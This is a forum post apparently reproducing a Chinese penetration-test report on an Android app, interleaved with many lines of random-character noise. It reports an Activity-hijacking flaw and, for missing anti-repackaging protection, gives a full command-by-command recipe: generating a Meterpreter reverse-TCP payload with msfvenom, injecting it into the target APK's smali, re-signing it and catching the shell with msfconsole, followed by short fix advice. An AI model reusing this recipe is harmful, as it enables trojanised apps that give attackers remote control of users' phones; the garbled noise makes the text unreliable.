% A# c* K' f" l: ?* O
. |4 M$ J+ L& W4 M
g. I: A' [% ?! s" \& k& E5 C4 w# J- D g( q
表1-2 测试结果
0 ~5 I# Y0 b; p( E4 X4 p8 A4 j6 C0 u+ M) A, T9 E0 ?5 s
* b4 \$ n; N$ G, m
7 X. l3 {( _8 e9 r. w0 V3 M1 L
( c$ G/ ~2 H6 l, [. H) q/ O
$ v- {( f, b6 [ 3 V4 S! K) I k) C3 o3 n( X9 h
! t* m% W' a% x- y/ h+ Q
, q; F$ h7 @2 c7 [
" [9 |# ^3 Z+ ?- G
- | x3 a: j! U1 |# _
+ J8 |3 ?+ o# c# j! Z, F' q 2 检测结果 / V5 l2 a/ l% ?' }; `
! v3 U, g. m3 O! F3 @" T
* l" t$ v% t+ P6 c9 p0 T) V# e$ |, R3 R7 t5 u, {0 p# x' A
. g- Q S J5 [$ S$ T( D
- N7 w- V2 c: W+ E( W# n- T
2.1 某某某
( s/ C4 U$ ~4 W1 [$ X s5 D/ A* y9 U/ n% y3 E$ L: @
" m1 d. h4 ~) d' t
, N, l" \5 |0 o( C4 f5 m$ V " K( }6 r2 f K4 {; V V
5 q1 t6 y: Z8 b5 [. o- Q 2.1.1检测目标 ! {) U' I$ {" d$ D- U$ f9 ^
/ f- }2 @; m, t% k! ~3 [
$ a4 Q. C2 B. Y% w. L- v; O4 U
6 i2 @* M, o# U; \; Q5 d/ ` ; X: r# _/ X8 P4 U
& J% U$ G9 o, a& R$ F7 F, e/ J5 T) e 目标地址: 某某某某某某APP
' z7 T W" j w4 g p- E, T7 U, o- M- d. }
& [5 Z- L$ I Y/ _
- v0 R6 ^/ Q. C+ K1 l
. Q0 M6 B% R5 _4 w% D. U/ L q) y% J) @( w5 Y
2.1.2检测结果
5 e! }: E C( ?: V. a+ a, u$ P, H c0 Y% d7 I, R" P2 A
/ T2 L6 q% ?/ d: p. c5 ^) K
; a7 Q1 _! r$ q. B9 H
1 u( [2 g2 a! F1 {3 w" q* o5 ~+ x! c7 Z8 o+ O* v8 _' y3 m
2.1.2.1
. |% A& b" o$ r5 z& g
4 P E1 y; ]. T8 n& M, I! Y
, \$ E- P) I: @) g( N' s1 h7 x; L; d: K Y# u2 L# J
8 c: W; q5 d2 r% `# F6 c
# _) i5 M6 w, x7 s 漏洞链接地址:某某某某某某APP
- c2 ^4 z" K) O' X, Q5 G% z9 |8 \4 x8 Y: u6 W# w) ^
- w: ]- y, O9 _' [( x
+ D% w, @$ c* L* n
. L4 t' \9 a+ ~" l5 y
6 h" Q! r& h4 A9 o& _% ^ # i4 c: {' v( \7 }3 ^; J
0 t- W: m+ s; v3 j: U, L
7 v4 M# m6 E6 G; A9 g" F8 s
% ^( o. t2 M$ j- A! o0 L
) q& l) u9 P" B1 ]8 ~; F/ |- S
% I& C" H. c, I! ^% P
漏洞分析及取证: + g8 D% k7 y" z3 B
& B, u9 a4 C6 A M9 [; s# v: A6 L
% v. m% a& e& ?! V2 X& [
3 A* F# g. E @9 N $ {* Z9 f5 a+ v/ W- d' d2 C8 B
& d# n; r0 }: B: o) b
通过androidkiiler反编译,发现app未进行安全加固, Activity 为com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: 8 C9 ^6 u# R0 ?3 q$ y% h
. R) E+ g- e: P c/ N
3 K! M: E! o9 S( C
) h2 m+ V+ N2 i; ^3 |
/ }) Y# R: M* D/ G3 ]% Q! Q- c
$ A5 p$ `! K6 F; O7 k" P1 N( R
/ _" E! Z# b0 j# I
# N+ t1 N% O! i8 L
* e0 e5 e* j8 f# A0 P. H& Y
& x' S! C0 ^: h- r5 k
# E, n/ i, g+ @: n# C. j4 l _/ x4 C L& H- V2 Y' h E
* N9 J6 t; [5 i5 S
* E/ T& R+ [# G; {
% o! j" M( U$ P/ O, D4 v
5 N4 {9 ^' M9 K
1 `+ O* ~9 z g ^/ {8 F$ Y' i0 w8 N$ W2 C' j6 A* d; J
5 O5 T; u2 K: T
: n5 S& M- s: \% J5 z* |
0 z- h+ _; @5 I+ ~2 f
! F- F9 a+ J4 t5 d( { - a1 \/ G3 C) l4 p
& \7 S2 l" O: M, d+ S" { 
, h, v. n( V; G( y5 q5 w, C' i$ w! U' E
3 b( e6 X( s1 S1 r. j
# m8 T2 }9 d& a. q" j
' k; Y \0 b/ p% d, Q1 u
/ ?" v! D# l3 }+ L7 G" c
) G* ]8 K: E4 g/ G! Z$ t3 ] 
* o+ s2 v+ ]% x2 c9 @ j- m- _. F; K9 ~2 x( K6 F. _, H; M, p$ I- U- W
* j9 L! V) O+ D) w1 l1 v" n
+ {; O6 r4 M9 T; G E ! X @7 u- Z5 F! h# `. v. Q
$ Z$ P* Q7 E% X9 A5 b' S 漏洞危害:高
8 |9 X2 Q F# V2 X0 N& w
( U6 B: B) {3 ]4 \; v$ b; U
! ?; Q: G6 e1 e+ T5 `
/ u: ^* N7 [4 n& [" C0 B* d; N+ \ D
8 r8 {' [& T4 s+ r* q- M. j3 @* ~: b0 H3 t6 c- R, c3 g
# E- I4 h! R% h( h: D+ c" ?/ n: i2 d$ u1 `8 C: m& B
5 ~+ V5 ^' S3 f K' b# j1 o4 o M# B3 i. t
7 s7 P( X3 o& V- S3 A% Q
( g/ t& S- B. E! i1 E' }% Q | 8 E. g. a1 E2 p5 `
$ k4 i3 w- F. z. m# r5 R: `
! A1 t8 s/ u R9 x" y) x' d7 ?3 Q0 m; ^# ]+ \" a8 d. R& }
严重程度 4 E y+ T: |) ^
8 _ }5 W% {3 F6 ~8 b6 P5 ^
$ P: X# _7 l, ^9 U# _. n4 [
, e; t; Z* M3 c: S5 X% s3 p' a, G( L3 }3 W | / L+ {8 c9 Z/ H& \- j/ Z
- G$ }, X. g' c( }7 i5 O- ~
+ r+ e) Z# a, W- e/ k) W
. e7 R5 d, [; o2 A& B2 y- {
8 X/ F# O! I' x. l% U5 a+ H, |- }& H# p
高 + ]. ~7 n9 P( Z; }
$ n& a6 a7 p; i( p" R- G7 N+ k
( v7 _) E' h a! S
! G$ Z v3 C" @/ P7 w | % U$ \( j9 f9 h
5 u/ D5 V5 q+ i! Y# @# Z3 i
1 h* ]0 s# Y$ K* o* @$ R& L9 U2 }7 `: c" P* S% Z
, M: Z; W. o& b" p/ u& ^ U, T
" I: |# l# P" c9 x3 I) }/ a$ `
■
, v4 r3 e, n, |+ d( I2 ?& [3 y1 d& H- K' t; G- M; O; n5 E3 g1 I
' q# e9 N1 M9 k: g% p
2 M+ d/ ]3 V; D* ?( h | + @9 E7 x i2 T$ F/ F Q( Q6 p
9 z1 z, u n* _: \. m 7 c8 d3 p( F0 l: L* `
+ j l5 v1 T# }! q# D ' ~3 j4 _! a/ j
" g& M' q; |# G% v) i, E- A
中
! t0 g* n; d; q6 N# j3 e, j y: V) B: ~" n1 r2 |7 }- A% G' v! [
9 ^2 M" x" f( Z& c% [/ i+ z( M- |! p1 @6 E! g, ]9 c& M: j% x2 a P
| 0 v2 K0 V/ W* V+ I# [
4 N* m2 G* l% Y/ a3 c % R; _. A4 f( |7 l o( A; I
u" D& B5 Q. Y- _0 h 8 E; S3 V, W9 Y8 U4 L; D
# i" w/ S0 U' K2 g
) c4 z- @% ]' T& o% K7 {: ?
# r: \3 \/ q. F8 u " F) p( `. O$ g! z$ s/ l3 [6 ]0 ?
# `) c8 V) [- u/ s, h& M2 K3 u |
- f6 I! u* U( x
$ ]5 J t" ~1 _3 u# [9 }% ?& q
- o2 K! z8 Y( Z! `% o" s% G1 M; u- z9 W; n. m, t" y
0 S. R' p+ h3 W
( b6 y* c9 ~+ C
低 : s$ I: A, s$ g& L
% G; p9 W7 g0 j D Q
- R, \: r6 W+ X1 _1 o: }6 b" P0 h t* Z$ z3 O4 m' b
|
" v7 M# ^; s7 z
' a# p7 j& c2 g9 E$ ]" y( n. G
' l ?6 U# u" q+ z! X
6 f% K7 H! k, B2 n6 s7 j0 K / o& B0 f, k# V9 }7 R
! d' Z& t& V. N& B
; f/ V" i* V- Y
3 u5 R3 c* J* I& ]7 I: L
. g6 R: W) L- R9 U$ g8 b3 t5 y7 C2 Z7 ], w3 P% y. a
|
# T5 i+ C9 r! l1 {% v- Q: o" c
) }0 y7 {& ~/ M% t: q `
/ S5 l. Z9 z7 E" Z6 G6 W$ V1 T s% ~3 D
* \2 ^2 e# H, O% \7 v
v: a4 |0 n0 o: v
5 |- J, a- P2 A
' z; R: h) W: l& b( m0 ~
6 q- ^( I8 }) ?8 E6 V- v1 K
6 l9 m0 K4 ~: N- j4 J! s0 W
8 l' s1 j3 F" j* e) O% e& e# k$ |( o" O l
# s/ k) j3 [8 r
. t5 f& l3 R5 M0 b2 y9 T+ B
1 e( i) p3 o, {" z, T8 X# ?
1 t1 R: i/ }, W* H. P; ?8 j$ U % L3 e% R% R8 @6 P
1 |! m+ P) Z6 P! [" p3 `4 c# @6 q 修复方法:在 APP 的 Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 : m- u. R2 e5 B
* X9 m" c9 a2 h
7 t% I$ Q$ b. A
% d" J7 \' M6 P2 ^
! i' \! @. w4 |, I5 K. } `" [% V2 `4 U
: T( ]' V/ b5 N# v6 T$ C [! j
* S7 }) m Z1 ^# u% X! t
- G! ?# ]' d: g$ H% B! A8 f, v- X3 w! |9 I
! C& c( k+ b* m. S. \5 J" a" C2 ` s
3 @( o7 F4 g: Y, Z4 c3 r; Z
, C* R; P$ z+ U( n3 y' Q
$ `- ]0 S3 e3 C
) r' _9 E8 M9 d T$ a$ w
4 l2 Z' m& i! n/ K% H" }4 p
$ P3 F$ o. B. A0 B" g6 v 2.1.2.2
$ g0 C1 `6 R) J: z% |
' ^. W$ s. o$ d; H) h4 W
% x3 M5 e1 \, H: q6 d
: ~5 q6 q8 ^% R 7 b# M& |6 [" _3 K6 u' D7 J: p) U
1 h E& E% T2 e( U/ \3 x: Q 漏洞链接地址:某某某某某某APP " U, c9 I0 t* W& R5 n
& @- a- n. N% `* I1 i& d) w+ M
5 Y3 T ]/ A! I! R6 ?2 ^; S
: u- V, J) v( B1 Z 6 X% Z* d% n! M9 j
; N) M2 J/ |' Q! X {5 L 漏洞分析及取证: 0 i+ @* N1 d5 V1 F8 u$ v
! [0 w7 l l) @
) k' H0 b# U4 w7 f9 o' t, I m
& w6 L) M! P1 G5 S! [# N . [7 X9 K" A4 J
- @! ~ V- j: V/ X2 @ {
通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下:
- K3 a3 q; D _- z1 H. P1 `4 F# o( B0 K
% g$ J) x& V. C$ X( g& A
2 ~/ c) J; H' V0 c% z D! U& j& w3 i- Z. F& i3 }5 O3 v
7 e: j/ v3 l, C( r# m1 _: Z6 B 用Metasploit 生成木马 apk
4 y, U1 [5 n# G: n {3 Y8 ]& B. j: F( h {! Q+ P: {$ V+ O" \: ~
( K& K8 W: L o& ~/ O
0 S/ l1 t( C! u
# v1 t' o5 {0 D# P, z& J) G; X- Y0 X, @% }
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk " R$ e) S7 V, b* U o& I
" {' O$ D3 X* ~
4 M/ h. s9 N; a% d3 K2 z* g
( E% V& O4 m7 A- j8 o. [2 H" A
- F. q' d2 L" M. v) t/ o4 [; S* W
: K6 s' e' q$ x; A6 x3 C 反编译目标apk和木马apk # a$ Q2 |2 m3 ?+ S, {" Y0 h q9 }
4 ?& J2 D9 R1 [: b* L8 L5 E) U9 o" Y
. H0 ~( t& m. x3 P5 V2 G4 }
! Q$ U. ?4 b( g2 D' O$ T 5 C' X" J) N3 q6 l+ j2 i, Z, Y
& Q$ o; P! b% V6 |; z) S apktool d target.apk
) G- ?; ~9 K8 d' g% b- U8 D
! b% U1 a0 O9 B0 Y% Q; H y apktool d cockhorse.apk
; ]+ V' u# @5 m" V+ f* H Q6 H% U _5 o l" C7 H* a3 u
( E# V8 @8 c4 _9 L8 o9 Y5 W" n; _" K
* s$ ^; [- u9 f- d8 l" s
, T2 w! U0 o7 v9 S) G4 D3 I 木马 apk 注入目标 apk + E7 P1 K& Q I+ t
7 @; {( m; F' `; D! `: \5 @
! Z2 [8 e; z* y- O4 V& V8 Y
- k+ P. N" d$ V7 S; `
, C8 F' @0 r6 T6 n4 V; B4 `$ _# D& D5 }) \/ ~; m
在目标 apk 反编译生成的文件中找到启动 Activity 的 smali 文件,并在 onCreate()方法中添加如下代码:
- z* C g4 g3 e" |
6 L& q8 A; y% G% a: R
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
! D, u: j6 T! F
5 F6 t! E4 Z: F' Q& w/ L% i, X* m! N
- M% |4 K/ C5 g! i% [
7 W' F4 Q3 w% e
- Q: ~3 G$ O3 d% I, H; F
8 @+ F$ l) y4 z! ]- Z. R 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复
5 l" E/ z7 r& u. S" i; K) y( _! N: L( V& z k
: m/ i7 d/ A. D0 n( x
$ d, n8 }& `. T
. N6 D) ]3 q, D" l9 }. v2 j# D( t" N; W x4 O
将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 下 j2 B- L, a% K
1 o1 l: s: G" k
2 @0 _% `0 ^9 a" i0 ^$ w/ N% V' R- P. D) L9 v! O
" `" l3 U& `% l" e* Y/ c$ x! \ d4 o: t3 Q" x" d
回编译生成最终 apk 5 ^. A$ j" N/ N
3 P v8 P& \+ s# n# ? v# ~3 @( t
/ C! \4 Y( Y, s
/ _1 F$ Z2 H, g0 s* T1 Q8 f+ x 5 j! ]/ v& w5 p, n
' q$ O1 C7 J- }: O! r Y 重新打包 2 C" M9 B$ Z% ^2 l |) n I* a* Z7 v
+ L2 p& {1 u5 B7 c; W, c
- B/ T7 ~9 q6 J! G9 G6 d4 t
. l6 t ?) F4 z- C
9 n& ^1 `- ~5 V" G# M
@! S$ z2 m/ R+ m; G" e; J apktool b -o repackage.apk target_app_floder
; E; w. @6 P" J& Q! I$ N; V1 R* D, z0 B7 {2 ]$ [# C
1 `8 h: v' z, ]/ O' I
3 O% `* q' E4 M. R+ z: Z# L
5 ]4 @5 ^: ?( ]3 G
1 g3 [( o H! m7 Y+ N7 N 创建签名文件,有的话可忽略此步骤
- L$ K( J; o: B0 h# L/ z! X1 [, p U0 b. r& s
% S; ]; V8 t+ C
5 {5 d# P# I5 S
/ s8 m' `/ s4 v: _% f7 l2 R
6 V7 \ B7 u8 ]- c6 o' |
keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000
& ^- Q9 R7 C% k& Q( v* U6 Z! t( T2 @- K" R
- a8 l) m5 b& a
0 P A5 h. C( }& F
! j6 b1 t9 i6 V1 a7 l0 l! t# y/ f) s1 S
签名,以下任选其一 ) w8 @& U- ^. ?9 ^
3 ^ B2 B, [( V
. u- e( n3 K1 D* ^/ _4 B: F8 U% r j8 [3 E) w$ c
, U" w1 z# x3 c# Q1 _5 x+ _
& A" Y) N5 A; u* I2 {) o jarsigner 方式
# e# S7 i; j J( J& G: t' _
1 }/ n# _8 L& B
& N. a' ^; r2 S$ g# ^" D
' c* x+ ^; M; \& ?9 Q' ?
2 m( ~% H) r$ J& _1 N
0 i! x: H7 C. w& T, @9 G4 _ jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname : i7 B7 K7 c: ^" I, I
- R1 b4 z! n) s+ c
# x) i/ `5 o9 W( a5 y5 ]* q6 d) u; A% l5 u2 q
# x5 m6 _# P6 a) f t/ O8 o# X" T
apksigner 方式 6 B$ l: j) J: c/ f" B3 k J
% O+ H$ ], d$ _$ Y R" }" p$ X
& _( A G: ^' T M% {: ?6 R1 [- e, P# K( o# X7 a
' I( ?: s) [0 \, L) M
: `* J( C/ s( \' A \
apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk
( N8 ]2 o0 M2 G h# ?) G! d& A5 B$ i* T5 e! n
" d1 t! ?3 N) [% v( d
& a( h/ l& q: N/ l8 j1 c 2 S% r5 ?' \8 u% {& {
0 F: ?$ G) z, e( d( t 如需要禁用 v2签名 添加选项--v2-signing-enabled false
W4 K! ?/ r% |- |7 i. o1 i4 w
# ~1 m% p+ z. K0 P2 J: p$ v' u
% N& W' m' h7 G
& A6 S3 Y9 _/ g1 D 0 Y7 V5 b$ f- k$ L. r
) R. r" X B( u! ]
验证,以下任选其一 % p1 w2 _' x% C$ u& z4 }* ?2 B) q7 m4 |
( `; t0 j- R# a% [& m
/ N( W; c5 g# F+ _+ `
0 h1 L# v/ p* [) k3 `
( C1 S8 R' O, n# C( x+ O) j) j
jarsigner方式 . W# Y# U, C5 _8 y" M
! }7 y0 w! a5 w$ u% P. [
( K l$ k# w* Z, `- K
0 `3 d1 Y0 s9 e: ?" i# b: I* p
0 P8 w( V q2 _) X! B% q
3 Z' d. R6 L, N; U: @$ E3 o( p1 l0 U jarsigner -verify repackaged.apk 1 L) z9 M& z8 p& Q
" P6 d& A5 m) C1 p" Q1 q
" d& a; m5 W1 }
* R* m, j( W, @& t+ D2 f
0 w& A2 P- i$ H( K6 b
( F0 L/ u+ k; O5 w4 }. \- H; x7 X q
apksigner 方式
1 P: T0 ?0 Z! o. h% L
$ X3 S: R/ @, ?. \
* I. n7 q: D. o1 B" e. I# E, B' Q# F
; e* H, [% `, c0 ]# G% ]
! U' k, Y( H2 R' N" n) h5 ~! B3 Y; I
) E0 e1 N; C5 E apksigner verify -v --print-certs repackaged.apk 7 t5 a8 B' L/ H) y! w4 F: J
! K( H1 H4 L& [" v9 h, F+ y
1 _$ [1 g+ N" } r
! ?% N- P ?" N$ a" _! N. E
' j# U7 P; [$ f% Y
9 N# z5 q4 Q7 G0 W5 P keytool方式
6 Q; k* j1 K/ P ?
( W2 P* |- {- F+ S+ U# ^1 p& t0 B0 g
6 h% u* X* s" @4 m6 `5 [: f
0 i1 D: K0 ^; i5 } 6 ]* \/ g+ L+ h U
8 W* d+ |$ B4 ^$ A( H keytool -printcert -jarfile repackaged.apk & p& Y5 |/ {/ ]" W
" @. U$ W6 o8 _- T% N- s( b1 J: c
0 G5 N4 p7 m' x) ~* T7 f7 k9 |
$ W4 E/ D! y7 I
& f8 A) U7 K- _, ^' ?1 h
# j' I, M; y+ q5 h5 G 对齐 : L: E" z: V+ y% h2 H- P
$ J! m8 K" B& J6 p
8 O( m8 S4 I: I# m' n+ x: a, Q: v
7 g, H2 K6 ?$ B0 }0 M
0 ~$ r- T4 T5 [. T. D; N1 _3 l
3 A2 Z0 ], \" V! B- |- D
字节对齐优化
( ` G7 M: T+ J; Q* V2 N6 P1 O; t6 h- F+ v4 V
: Q& V: L) t/ O2 o7 c4 `1 ?4 S y
- m# }: z9 e( r
- v& Z5 ]* R; f& N( b' h8 ^
) W! x$ |! R! @ zipalign -v 4 repackaged.apk final.apk " k* c' H! l. ?7 ~
0 M! Y- \1 v0 R; G: f6 M6 ?8 U
# `* H: q' @+ A9 m0 X
4 E7 t4 R8 h) T4 I$ A; a! y
* V- d+ W4 W& d8 u' D
+ p( k( L& B, i6 ]0 r W, J/ \
检查是否对齐 ) l) }. k/ v3 R1 w& n
: Y9 U3 c+ W9 g" H4 i/ c
6 X+ x) C% g5 H
6 E; x; e4 w7 U% H
9 f+ g! _/ n; t" ^3 A, K2 J* x
; s, V# n/ O: r& L: } zipalign -c -v 4 final.apk 7 J* j5 _; W8 D
* D8 a h9 L5 K0 W% T
% U4 j4 m3 E6 m: t, p* q
' p% L$ a4 i% d- Y/ @& \4 E# Y
+ r+ l0 c6 y( i% o. b4 m6 z& m- j! c
4 F1 Z1 e- u8 ]$ I! _ 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 , r! l( l. C3 [. g. Z
" Y- T. D+ V( N
+ O) |% ]0 ^# H4 @
( Z5 K7 P3 e# H6 t' E2 n( a# B' _$ L
( [8 B. s+ r5 p6 T2 f' ~$ G0 \. _6 }: C9 ^
启动Metasploit控制台,配置参数等待上线
1 }& r7 g# H2 q% Y* S
% ^3 U( F |& y9 E0 ~% U+ @+ u9 m
7 v0 [8 a3 ]; e: W
) p: _. [9 x$ k8 g " ~. m) v v8 P$ K
; \# `' `$ h& K! H" m& M9 z6 Y' Z) c
在终端依次输入如下命令 0 Q6 u% r0 W, @, Z
# X I7 w: b7 C; t
, o% x" @) W2 n/ T7 ]6 i
4 q% R3 u* m7 D; T5 `
`5 n& c* x+ t' |% f* C; F4 E" R
+ ?5 b) m/ O [8 Z0 n msfconsole , s7 q8 k# e9 V& B0 [2 ~/ R; i
( m5 x: @- N! D6 {2 A
9 r+ N0 [. B2 N/ B
" c2 x5 O# J; N+ Z) \
+ @& K; |4 @( t/ D' t. y/ U, ~
use exploit/multi/handler
6 e: H& q( T; [( ]$ z& ^6 C& K
# {0 x0 }5 I1 Q) C7 w
/ D, K: h4 u7 [' X. Z+ s
3 M8 y) \3 b2 B4 I
1 ?$ }* L2 J: n
3 ~% ?8 Y4 R! I$ L) ~, {
set PAYLOAD android/meterpreter/reverse_tcp ( t4 a2 Z U$ J N0 p* C& d& x* X
% f3 U, r$ Y* i! ]+ m
; s/ x& ~/ s) k+ E+ s( M
M) k: W |" u6 b G# p$ F ) S ^5 \' `& N1 r2 T4 A! o
' a7 Q& @ y, R8 I- G* D( L
set LHOST 192.xxx.xx.xx . K* p% C! b, H7 x C' f0 J
' c+ y* r- W h4 J8 v- _! {
/ V) g: S3 l" R1 D
! Q+ X- k. A3 l& ]* w, O # a1 {/ Q# Y2 g/ W% w# T
, `* _6 z( u' s$ m% \- B |4 |
set LPORT 4444
' z; y$ j4 c' h' s( h t1 M& x
6 c% ^# g7 n u4 c. ?" v
9 N1 Y) G( i) F" K$ E, J/ t' [1 \5 t+ b7 L, N
9 _ c$ g% H# E0 c
, ~7 i3 V, D$ Q
exploit
& b: [' V% i1 s& D$ k1 s6 N+ P# h. D4 ] P2 Z* W9 D
- }9 ~8 D/ a/ D; I9 N7 j
0 G$ T% K( Y. n: Y! {5 F Y M; C) |& T: R0 I( O( v' v! ]
% T3 R/ a) e9 L 之前我们把入口放在 MainActivity 的 onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图: 
. K; N/ }9 o4 E% g6 O. G7 Z' Y. b
; |3 h5 v! @$ k2 ]2 p
9 x* z0 D. B! B" j7 W7 M
3 F6 \& K* q8 U5 Q5 a8 e
1 k+ h% Y6 r3 |& G7 b( _: _0 w* S/ A0 Y
漏洞危害:中
) |) g8 Z% c. h1 |* O$ @+ S( n# w! o" z g
8 y& m" y2 x! L/ O( k$ [# r
8 Z8 W% t" q: [5 z
' n% @" o- s) g" m
) F+ p7 G5 e1 P6 a. {
! I7 `8 S# J- J
0 ~$ A$ Z, t+ K, T J 1 S: N( T6 _4 Q2 j
9 _5 t# M: E9 H+ ]: I
# O$ m& w: |5 u4 ?
8 o5 E: @& R/ {. m# {
7 l- T, n: {/ p$ c& N; _" u4 R
5 Q! ~' {" R) N9 f9 d* q |
6 s. e2 s- ?: X7 A' s) W( R- }" R6 n; l: _% O* e$ p
+ ?5 G; _4 p' Q m
' f. e+ Z L4 O/ s" ]* m# h9 \+ M6 t; [ 严重程度 5 |) r6 i! m) ^/ _
' V/ Z- _; b! B9 T
3 f4 g8 C, u; d3 W" J2 ]
/ F, e/ R$ l* t3 I& H |
0 J p9 ]/ ~3 Y6 M0 v
g8 O* A, P$ B' f , p1 }+ a4 U8 t4 M& z& h; h, b
& W9 a; p% ], V& R% @; V f. G
$ x# U6 K5 [( ^+ e6 _
+ z/ w7 S. u' |& a. x# o% l 高
3 w) }4 H5 l0 s: l/ }
- U+ y$ r. ?0 X- r/ ^( l" Q$ X7 s6 {
3 y* m3 i4 Y" y! ]8 ^( c* ^
' ]2 Y; R* Q7 h, o( P! ^1 J( A | : p3 R' A- ?5 `& S9 |
$ S3 E: U) g$ O7 H
# D2 J" s7 i3 a/ N0 W6 Y3 m+ z k/ \# m! t7 d. r5 J
' j+ {6 N2 {% }' @) L5 \3 D Z$ h0 e) g: x5 |) j$ \
■
6 u5 @: f. w2 Y: R/ R6 s9 l2 V/ C: I. a1 X
' N) ~ q3 B6 \5 I1 E' l( |) N$ r- X
2 n# L) ?# ]* r' V& C
|
7 b- V) u" G# U3 g! @
$ T7 v# `, J9 f* D% s . Y. a# H. s4 i8 W
* N; l1 V b- r' f1 w
: s( A1 @& V h E1 a
* _$ G; ]: h, ]( H) {% A: `
中 " K Y1 @! i4 V
, D4 }$ C6 ?% G4 y. B+ _2 v 7 t' u) Z( m k7 V) F
/ {2 {; F+ q: I5 A# H6 Z0 j8 e | ) R8 `$ B' S3 Q# h% p
5 i# i$ H5 c! R( g: ^- \
. s; ?* h, e- |' i% U% _- v, Y' P* O7 {( V! G/ S5 x
5 Q; f6 w( f, g' t* w* D
) N# X+ U6 c' A3 Q" }& |& C1 v$ F : P4 n4 {! [: o
$ Z: M4 M2 L% s+ N; t
: U* c, i, p! ~ F- E5 z- A9 H* L/ u" a. s. c
* a/ j0 y& x$ u' O2 k
( O |' ], n* }: c; c |
1 ]+ f& [/ _3 d, m+ b
1 l/ {4 {# d% J& A) p) H
! h/ B9 v x; W9 Y N5 E5 P) O" P* A0 a- L: _
: I+ p* E0 |! I, k. w. g( D3 J7 B. s: L9 e& `% }1 P7 z6 J& {, h
低 - g+ R/ j) S- s- G2 F* K# }5 V
Z2 @: {& `+ Y
4 V" _" U9 n. E( p" f6 A3 s6 Y6 O G' E+ X7 o, m7 E
|
& |4 R2 D! t7 P* ^$ u: k
9 r, e' R k7 [/ L% g
0 t1 }$ m9 K4 V0 i* s' y2 X2 m2 S4 b& [) _1 y7 I
$ E2 G. U. L3 a, ^
1 k T0 `* \- |4 u) p6 D 0 O$ R- g9 G8 h$ M& B4 K% e
/ u. m/ t* j; ]2 G: e: t9 H
w/ P0 x7 ]8 Y- p. V7 c$ l0 P+ |; |$ F6 e
) f$ y* P2 B" A" @5 o4 s
; ]+ A) k) q6 ^" V& ]& {: f! Q |
( k" A4 e2 T3 }% J$ ?* \& k/ x1 s% B/ U' ^( l( f
6 }" i) G9 a( P$ x6 S5 G M/ w2 Y; d
; q8 H1 j% D2 R5 N
. i: {& d: R8 A R; a
- B k9 c/ U' w9 [% i( n
7 t+ G- L! A+ n- c6 e" B 6 b) Y4 l* h3 e; S' D/ N
+ g, M' R' X, R: Y! x 7 S& @) s3 `/ ?
5 a N% P' s& t; X$ ^/ {
5 d# @+ T+ G8 q. f$ r- e' T7 s
9 o* Z6 c, H# ^6 B0 Q
( Q- c% |9 v% ~5 c8 z5 ^& c+ w7 Y
# H* ]' b! T+ p8 s9 ^
* a/ Z2 I! P" W3 u/ m
; t3 y7 R. i9 H. u4 l) Z, e2 z 修复方法: . P- s a6 B. n$ `& E2 V% ~$ k$ b! S
$ I8 f: ^0 N, K; v
- a, r" `* y8 G" `
( _4 A4 A# @ e" M: y
( U' c" w$ T' n4 _
9 _1 G; f$ ]$ C0 ^+ I5 b# U 1.在 APP 启动时应做签名校验防止二次打包。
+ `9 H" M1 F3 q- D' B- b) X* V5 o
* N4 ]3 D5 W: s8 O/ D x& R 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。
8 @4 y+ O* q% O; Y$ g% U- y' i! S. ^* `$ N3 u j
4 x. p4 X7 ?, o3 s; `* ?% R
6 R+ b2 f; U7 c0 P 9 @4 u9 k5 `& R$ z
. ]+ g$ _: O9 t6 U# A: W
( u) F5 A) H _$ z
/ @. T& L2 r, U
; B8 ^) |' r4 P" S
( T) w, L4 @5 p( g. E' `% f! d
7 b" @0 |; j4 `/ d4 w/ k
6 n" m) S; y0 N. Z 1 {/ y u9 P0 j7 E7 U6 e6 V) S
1 L% U Y" C& d4 U9 w2 ?5 @( Q0 d1 h o) K( d! G+ Y% O$ Y1 r
2 R: {' l/ r1 ^8 ?& U
( e$ g% m R- O- u
' ]" t7 v- R. E. R1 j4 u8 C
* a8 h9 C4 |4 Q ~' n. _ Q
( F; A) ]/ Y6 r' m/ ~, X6 [. |, S
发表于 2022-6-8 20:32:44
收藏
支持
反对